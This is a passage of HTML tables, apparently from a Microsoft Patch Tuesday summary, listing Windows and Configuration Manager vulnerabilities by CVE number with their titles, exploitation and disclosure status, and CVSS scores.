style="width:38.30128205128205%"/><col style="width:13.782051282051283%"/><col style="width:17.467948717948715%"/><col style="width:16.506410256410255%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59213"><span style='font-size: undefined;'>CVE-2025-59213</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Configuration Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59497"><span style='font-size: undefined;'>CVE-2025-59497</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Defender for Linux Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55320"><span style='font-size: undefined;'>CVE-2025-55320</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Configuration Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.7</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Windows vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:11.37820512820513%"/><col style="width:45.3525641025641%"/><col style="width:13.782051282051283%"/><col style="width:15.384615384615385%"/><col style="width:14.102564102564102%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-49708"><span style='font-size: undefined;'>CVE-2025-49708</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Graphics Component Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.9</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58715"><span style='font-size: undefined;'>CVE-2025-58715</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Speech Runtime Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58716"><span style='font-size: undefined;'>CVE-2025-58716</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Speech Runtime Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53768"><span style='font-size: undefined;'>CVE-2025-53768</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Xbox IStorageService Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55339"><span style='font-size: undefined;'>CVE-2025-55339</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Network Driver Interface Specification Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59207"><span style='font-size: undefined;'>CVE-2025-59207</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50152"><span style='font-size: undefined;'>CVE-2025-50152</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55328"><span style='font-size: undefined;'>CVE-2025-55328</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Hyper-V Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59241"><span style='font-size: undefined;'>CVE-2025-59241</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Health and Optimized Experiences Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55694"><span style='font-size: undefined;'>CVE-2025-55694</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Error Reporting Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53150"><span style='font-size: undefined;'>CVE-2025-53150</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Digital Media Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50175"><span style='font-size: undefined;'>CVE-2025-50175</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Digital Media Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55677"><span style='font-size: undefined;'>CVE-2025-55677</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Device Association Broker Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59255"><span style='font-size: undefined;'>CVE-2025-59255</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows DWM Core Library Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58720"><span style='font-size: undefined;'>CVE-2025-58720</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cryptographic Services Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59191"><span style='font-size: undefined;'>CVE-2025-59191</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55680"><span style='font-size: undefined;'>CVE-2025-55680</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58728"><span style='font-size: undefined;'>CVE-2025-58728</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Bluetooth Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59290"><span style='font-size: undefined;'>CVE-2025-59290</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Bluetooth Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59192"><span style='font-size: undefined;'>CVE-2025-59192</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Storport.sys Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59199"><span style='font-size: undefined;'>CVE-2025-59199</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Software Protection Platform (SPP) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55696"><span style='font-size: undefined;'>CVE-2025-55696</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NtQueryInformation Token function (ntifs.h) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58722"><span style='font-size: undefined;'>CVE-2025-58722</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft DWM Core Library Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59254"><span style='font-size: undefined;'>CVE-2025-59254</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft DWM Core Library Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55697"><span style='font-size: undefined;'>CVE-2025-55697</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Local Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53139"><span style='font-size: undefined;'>CVE-2025-53139</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Hello Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55698"><span style='font-size: undefined;'>CVE-2025-55698</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>DirectX Graphics Kernel Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59200"><span style='font-size: undefined;'>CVE-2025-59200</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Data Sharing Service Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55326"><span style='font-size: undefined;'>CVE-2025-55326</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service (Cdpsvc) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59502"><span style='font-size: undefined;'>CVE-2025-59502</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Procedure Call Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59206"><span style='font-size: undefined;'>CVE-2025-59206</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59210"><span style='font-size: undefined;'>CVE-2025-59210</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55693"><span style='font-size: undefined;'>CVE-2025-55693</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48004"><span style='font-size: undefined;'>CVE-2025-48004</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Brokering File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59189"><span style='font-size: undefined;'>CVE-2025-59189</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Brokering File System Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-53717"><span style='font-size: undefined;'>CVE-2025-53717</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55340"><span style='font-size: undefined;'>CVE-2025-55340</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Desktop Protocol Security Feature Bypass</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55685"><span style='font-size: undefined;'>CVE-2025-55685</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55686"><span style='font-size: undefined;'>CVE-2025-55686</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55689"><span style='font-size: undefined;'>CVE-2025-55689</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55331"><span style='font-size: undefined;'>CVE-2025-55331</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55684"><span style='font-size: undefined;'>CVE-2025-55684</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55688"><span style='font-size: undefined;'>CVE-2025-55688</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55690"><span style='font-size: undefined;'>CVE-2025-55690</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55691"><span style='font-size: undefined;'>CVE-2025-55691</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59193"><span style='font-size: undefined;'>CVE-2025-59193</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Management Services Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59194"><span style='font-size: undefined;'>CVE-2025-59194</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59261"><span style='font-size: undefined;'>CVE-2025-59261</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Graphics Component Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-50174"><span style='font-size: undefined;'>CVE-2025-50174</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Device Association Broker Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58727"><span style='font-size: undefined;'>CVE-2025-58727</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59289"><span style='font-size: 